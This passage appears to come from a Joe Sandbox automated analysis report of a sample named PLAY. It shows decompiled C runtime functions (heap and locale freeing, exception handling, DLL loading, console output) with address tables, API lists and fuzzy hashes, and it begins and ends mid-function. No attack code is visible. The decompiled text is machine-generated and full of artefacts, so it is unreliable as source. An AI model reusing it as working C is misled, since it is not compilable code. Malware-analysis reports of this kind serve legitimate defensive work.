						if(_t31 != 0 &&  *_t31 == 0) {
							E00AFC2CE(_t31);
							E00AFC2CE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00AFC2CE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00AFC2CE(_t74);
			}















          0x00afdd0a
          0x00afdd0e
          0x00afdd16
          0x00afdd1f
          0x00afdd24
          0x00afdd2b
          0x00afdd33
          0x00afdd3b
          0x00afdd46
          0x00afdd4c
          0x00afdd4d
          0x00afdd55
          0x00afdd5d
          0x00afdd68
          0x00afdd6e
          0x00afdd72
          0x00afdd7d
          0x00afdd83
          0x00afdd24
          0x00afdd84
          0x00afdd8c
          0x00afdd9f
          0x00afddb2
          0x00afddc0
          0x00afddcb
          0x00afddd0
          0x00afddd9
          0x00afdde1
          0x00afdde2
          0x00afdde8
          0x00afddeb
          0x00afddee
          0x00afddf5
          0x00afddf7
          0x00afddfb
          0x00afde03
          0x00afde0a
          0x00afde10
          0x00afde11
          0x00afde11
          0x00afde18
          0x00afde1a
          0x00afde1f
          0x00afde27
          0x00afde2c
          0x00afde2d
          0x00afde2d
          0x00afde30
          0x00afde33
          0x00afde36
          0x00afde39
          0x00afde39
          0x00afde49

          APIs
          • ___free_lconv_mon.LIBCMT ref: 00AFDD46
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD8CE
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD8E0
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD8F2
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD904
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD916
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD928
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD93A
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD94C
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD95E
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD970
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD982
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD994
            • Part of subcall function 00AFD8B1: _free.LIBCMT ref: 00AFD9A6
          • _free.LIBCMT ref: 00AFDD3B
            • Part of subcall function 00AFC2CE: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFB5D2), ref: 00AFC2E4
            • Part of subcall function 00AFC2CE: GetLastError.KERNEL32(?,?,00AFB5D2), ref: 00AFC2F6
          • _free.LIBCMT ref: 00AFDD5D
          • _free.LIBCMT ref: 00AFDD72
          • _free.LIBCMT ref: 00AFDD7D
          • _free.LIBCMT ref: 00AFDD9F
          • _free.LIBCMT ref: 00AFDDB2
          • _free.LIBCMT ref: 00AFDDC0
          • _free.LIBCMT ref: 00AFDDCB
          • _free.LIBCMT ref: 00AFDE03
          • _free.LIBCMT ref: 00AFDE0A
          • _free.LIBCMT ref: 00AFDE27
          • _free.LIBCMT ref: 00AFDE3F
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
          • String ID:
          • API String ID: 161543041-0
          • Opcode ID: e0f142b78f641a5e6ce30326a65746cde0bce78d89129923b628c466bc0e82d7
          • Instruction ID: 7b51ed54c466cd3763744eee3af47d24f07f27453941b62a824871c7e4d0eb71
          • Opcode Fuzzy Hash: e0f142b78f641a5e6ce30326a65746cde0bce78d89129923b628c466bc0e82d7
          • Instruction Fuzzy Hash: EB313D3260060C9FEB22ABF9DA45BB677EAEF00370F144419F695EB151DB75AC40DB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFBE1B Relevance: 15.1, APIs: 10, Instructions: 69COMMON
          Download Yara Rule
          C-Code - Quality: 77%
          			E00AFBE1B(void* __edx, void* __esi, char _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0xb04b80;
				if(_t67 != 0xb04b80) {
					E00AFC2CE(_t67);
					_t36 = _a4;
				}
				E00AFC2CE( *((intOrPtr*)(_t36 + 0x3c)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x30)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x34)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x38)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x28)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x2c)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x40)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x44)));
				E00AFC2CE( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00AFBC47( &_v5, _t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00AFBCB2( &_v5, _t71, _t72, _t76);
			}













          0x00afbe1b
          0x00afbe1b
          0x00afbe20
          0x00afbe26
          0x00afbe28
          0x00afbe2e
          0x00afbe31
          0x00afbe36
          0x00afbe39
          0x00afbe3d
          0x00afbe48
          0x00afbe53
          0x00afbe5e
          0x00afbe69
          0x00afbe74
          0x00afbe7f
          0x00afbe8a
          0x00afbe98
          0x00afbea3
          0x00afbeab
          0x00afbeac
          0x00afbeaf
          0x00afbeb5
          0x00afbeb9
          0x00afbebd
          0x00afbebe
          0x00afbec8
          0x00afbece
          0x00afbecf
          0x00afbed2
          0x00afbed8
          0x00afbedc
          0x00afbee0
          0x00afbee7

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: ad08c9aa4837eef4eb7859b1125b8d7daafd9ad145c00c036ec662df669a391b
          • Instruction ID: 08bf87ce9ef41bbe85d6967f48412957fe82a6998ebaf761a10f2feb74228902
          • Opcode Fuzzy Hash: ad08c9aa4837eef4eb7859b1125b8d7daafd9ad145c00c036ec662df669a391b
          • Instruction Fuzzy Hash: 9F21A77690010CAFCB11EFD5CA41DEE7BB8FF08360B0155A6FA55AB125DB31DA44DB80
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF8A10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
          Download Yara Rule
          C-Code - Quality: 64%
          			E00AF8A10(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t50;
				signed int _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr _t62;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t78;
				signed int _t80;
				char _t82;
				intOrPtr _t85;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr* _t99;
				void* _t103;
				void* _t105;
				void* _t113;

				_t76 = _a8;
				_v5 = 0;
				_t97 = _t76 + 0x10;
				_push(_t97);
				_v16 = 1;
				_v20 = _t97;
				_v12 =  *(_t76 + 8) ^  *0xb0b004;
				E00AF89D0( *(_t76 + 8) ^  *0xb0b004);
				E00AF8DCC(_a12);
				_t50 = _a4;
				_t105 = _t103 - 0x1c + 0xc;
				_t94 =  *((intOrPtr*)(_t76 + 0xc));
				if(( *(_t50 + 4) & 0x00000066) != 0) {
					__eflags = _t94 - 0xfffffffe;
					if(_t94 != 0xfffffffe) {
						E00AF8F80(_t76, 0xfffffffe, _t97, 0xb0b004);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t50;
					_v28 = _a12;
					 *((intOrPtr*)(_t76 - 4)) =  &_v32;
					if(_t94 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t80 = _v12;
							_t20 = _t94 + 2; // 0x3
							_t57 = _t94 + _t20 * 2;
							_t78 =  *((intOrPtr*)(_t80 + _t57 * 4));
							_t58 = _t80 + _t57 * 4;
							_t81 =  *((intOrPtr*)(_t58 + 4));
							_v24 = _t58;
							if( *((intOrPtr*)(_t58 + 4)) == 0) {
								_t82 = _v5;
								goto L8;
							} else {
								_t59 = E00AF8F30(_t81, _t97);
								_t82 = 1;
								_v5 = 1;
								_t113 = _t59;
								if(_t113 < 0) {
									_v16 = 0;
									L14:
									_push(_t97);
									E00AF89D0(_v12);
									goto L15;
								} else {
									if(_t113 > 0) {
										_t60 = _a4;
										__eflags =  *_t60 - 0xe06d7363;
										if( *_t60 == 0xe06d7363) {
											__eflags =  *0xb04158;
											if(__eflags != 0) {
												_t72 = E00B02860(__eflags, 0xb04158);
												_t105 = _t105 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t99 =  *0xb04158; // 0xaf869e
													 *0xb04104(_a4, 1);
													 *_t99();
													_t97 = _v20;
													_t105 = _t105 + 8;
												}
												_t60 = _a4;
											}
										}
										E00AF8F64(_t60, _a8, _t60);
										_t62 = _a8;
										__eflags =  *((intOrPtr*)(_t62 + 0xc)) - _t94;
										if( *((intOrPtr*)(_t62 + 0xc)) != _t94) {
											E00AF8F80(_t62, _t94, _t97, 0xb0b004);
											_t62 = _a8;
										}
										_push(_t97);
										 *((intOrPtr*)(_t62 + 0xc)) = _t78;
										E00AF89D0(_v12);
										_t85 =  *((intOrPtr*)(_v24 + 8));
										E00AF8F48();
										asm("int3");
										E00AF928B();
										E00AF9230();
										__eflags = E00AF8F97();
										if(__eflags != 0) {
											_t67 = E00AF8D26(_t85, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00AF8FD3();
												goto L25;
											}
										} else {
											L25:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t94 = _t78;
						} while (_t78 != 0xfffffffe);
						if(_t82 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}





























          0x00af8a17
          0x00af8a1c
          0x00af8a23
          0x00af8a2c
          0x00af8a2e
          0x00af8a35
          0x00af8a38
          0x00af8a3b
          0x00af8a43
          0x00af8a48
          0x00af8a4b
          0x00af8a4e
          0x00af8a55
          0x00af8ab6
          0x00af8ab9
          0x00af8ac8
          0x00000000
          0x00af8ac8
          0x00000000
          0x00af8a57
          0x00af8a57
          0x00af8a5d
          0x00af8a63
          0x00af8a69
          0x00af8ad9
          0x00af8ae2
          0x00af8a6b
          0x00af8a70
          0x00af8a70
          0x00af8a73
          0x00af8a76
          0x00af8a79
          0x00af8a7c
          0x00af8a7f
          0x00af8a82
          0x00af8a87
          0x00af8a9d
          0x00000000
          0x00af8a89
          0x00af8a8b
          0x00af8a90
          0x00af8a92
          0x00af8a95
          0x00af8a97
          0x00af8aad
          0x00af8acd
          0x00af8acd
          0x00af8ad1
          0x00000000
          0x00af8a99
          0x00af8a99
          0x00af8ae3
          0x00af8ae6
          0x00af8aec
          0x00af8aee
          0x00af8af5
          0x00af8afc
          0x00af8b01
          0x00af8b04
          0x00af8b06
          0x00af8b08
          0x00af8b15
          0x00af8b1b
          0x00af8b1d
          0x00af8b20
          0x00af8b20
          0x00af8b23
          0x00af8b23
          0x00af8af5
          0x00af8b2b
          0x00af8b30
          0x00af8b33
          0x00af8b36
          0x00af8b42
          0x00af8b47
          0x00af8b47
          0x00af8b4a
          0x00af8b4e
          0x00af8b51
          0x00af8b5e
          0x00af8b61
          0x00af8b66
          0x00af8b67
          0x00af8b6c
          0x00af8b76
          0x00af8b78
          0x00af8b7d
          0x00af8b82
          0x00af8b84
          0x00af8b8f
          0x00af8b86
          0x00af8b86
          0x00000000
          0x00af8b86
          0x00af8b7a
          0x00af8b7a
          0x00af8b7a
          0x00af8b7c
          0x00af8b7c
          0x00af8a9b
          0x00000000
          0x00af8a9b
          0x00af8a99
          0x00af8a97
          0x00000000
          0x00af8aa0
          0x00af8aa0
          0x00af8aa2
          0x00af8aa9
          0x00000000
          0x00af8aab
          0x00000000
          0x00af8aa9
          0x00af8a69
          0x00000000

          APIs
          • _ValidateLocalCookies.LIBCMT ref: 00AF8A3B
          • ___except_validate_context_record.LIBVCRUNTIME ref: 00AF8A43
          • _ValidateLocalCookies.LIBCMT ref: 00AF8AD1
          • __IsNonwritableInCurrentImage.LIBCMT ref: 00AF8AFC
          • _ValidateLocalCookies.LIBCMT ref: 00AF8B51
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
          • String ID: csm
          • API String ID: 1170836740-1018135373
          • Opcode ID: f0a907a475b813883b5e667e30c7b0dec09c3a407556594aaa432912ea7f0cfd
          • Instruction ID: 1b2ed4541aa16bacc952c4be763283f21808d07c99a7bc56a97dbbcd4786d5cc
          • Opcode Fuzzy Hash: f0a907a475b813883b5e667e30c7b0dec09c3a407556594aaa432912ea7f0cfd
          • Instruction Fuzzy Hash: 8E41C434A0020C9BCF10EFA8C8859BEBBB5EF45364F158196FA15AB391DF39D915CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFE053 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFE053(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xb0d488 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xb057d0 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00AFB8AF(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00AFB8AF(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













          0x00afe05c
          0x00afe106
          0x00afe064
          0x00afe066
          0x00afe06d
          0x00afe06f
          0x00afe075
          0x00afe082
          0x00afe097
          0x00afe09b
          0x00afe0ed
          0x00afe0ed
          0x00afe0f2
          0x00afe0f6
          0x00afe0f9
          0x00afe0f9
          0x00afe0ff
          0x00afe101
          0x00afe116
          0x00afe111
          0x00afe115
          0x00afe115
          0x00afe103
          0x00afe103
          0x00000000
          0x00afe103
          0x00afe09d
          0x00afe0a6
          0x00afe0dd
          0x00afe0dd
          0x00afe0df
          0x00afe0e1
          0x00000000
          0x00000000
          0x00afe0e9
          0x00000000
          0x00afe0e9
          0x00afe0b0
          0x00afe0b5
          0x00afe0ba
          0x00000000
          0x00000000
          0x00afe0c4
          0x00afe0c9
          0x00afe0ce
          0x00000000
          0x00000000
          0x00afe0d3
          0x00afe0d9
          0x00000000
          0x00afe0d9
          0x00afe07a
          0x00000000
          0x00000000
          0x00000000
          0x00afe080
          0x00afe10f
          0x00000000

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: api-ms-$ext-ms-
          • API String ID: 0-537541572
          • Opcode ID: cb9f6ec5a94c4b8414195c52481b3f3a8d4af0bf08a4e462bd0f25d94cfe4e7a
          • Instruction ID: 5b31f93c4e550ab99698026f3f8c8ffc4ec141a8366032bdbff44d7e563579ad
          • Opcode Fuzzy Hash: cb9f6ec5a94c4b8414195c52481b3f3a8d4af0bf08a4e462bd0f25d94cfe4e7a
          • Instruction Fuzzy Hash: F221B771A45229ABD731DBA5AC45B3A7768AF517A0F250220FB16F72B1EF70DD0086E0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFDA50 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFDA50(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00AFDA18(_t45, 7);
					E00AFDA18(_t45 + 0x1c, 7);
					E00AFDA18(_t45 + 0x38, 0xc);
					E00AFDA18(_t45 + 0x68, 0xc);
					E00AFDA18(_t45 + 0x98, 2);
					E00AFC2CE( *((intOrPtr*)(_t45 + 0xa0)));
					E00AFC2CE( *((intOrPtr*)(_t45 + 0xa4)));
					E00AFC2CE( *((intOrPtr*)(_t45 + 0xa8)));
					E00AFDA18(_t45 + 0xb4, 7);
					E00AFDA18(_t45 + 0xd0, 7);
					E00AFDA18(_t45 + 0xec, 0xc);
					E00AFDA18(_t45 + 0x11c, 0xc);
					E00AFDA18(_t45 + 0x14c, 2);
					E00AFC2CE( *((intOrPtr*)(_t45 + 0x154)));
					E00AFC2CE( *((intOrPtr*)(_t45 + 0x158)));
					E00AFC2CE( *((intOrPtr*)(_t45 + 0x15c)));
					return E00AFC2CE( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




          0x00afda56
          0x00afda5b
          0x00afda64
          0x00afda6f
          0x00afda7a
          0x00afda85
          0x00afda93
          0x00afda9e
          0x00afdaa9
          0x00afdab4
          0x00afdac2
          0x00afdad0
          0x00afdae1
          0x00afdaef
          0x00afdafd
          0x00afdb08
          0x00afdb13
          0x00afdb1e
          0x00000000
          0x00afdb2e
          0x00afdb33

          APIs
            • Part of subcall function 00AFDA18: _free.LIBCMT ref: 00AFDA3D
          • _free.LIBCMT ref: 00AFDA9E
            • Part of subcall function 00AFC2CE: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFB5D2), ref: 00AFC2E4
            • Part of subcall function 00AFC2CE: GetLastError.KERNEL32(?,?,00AFB5D2), ref: 00AFC2F6
          • _free.LIBCMT ref: 00AFDAA9
          • _free.LIBCMT ref: 00AFDAB4
          • _free.LIBCMT ref: 00AFDB08
          • _free.LIBCMT ref: 00AFDB13
          • _free.LIBCMT ref: 00AFDB1E
          • _free.LIBCMT ref: 00AFDB29
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 64db91aa97ebdee552574848fc2154d68ebafa8aa1e5147d28cceef67ca408a0
          • Instruction ID: 0e2021f147f0d2f1d5d9efc6f27566fb41e3877131f4778a836b6f3891f71e67
          • Opcode Fuzzy Hash: 64db91aa97ebdee552574848fc2154d68ebafa8aa1e5147d28cceef67ca408a0
          • Instruction Fuzzy Hash: B2114F72944B0CBAD521FBF1CE07FEB779E9F00760F400C19B79976052DA65B5059B90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFFA05 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 64%
          			E00AFFA05(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0xb0b004; // 0x700d25f7
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_t176 =  *((intOrPtr*)(0xb0d280 + _t246 * 4));
				_v80 = _t282;
				_t10 = _t176 + 0x18; // 0xc3c18b00
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 + _t10));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E00AF9ED4( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0xb0d280 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0xb0b758)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0xb0d280 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0xb0b758)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0xb0d280 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E00AF9960( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0xb0d280 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00B00723(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E00AFD227(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
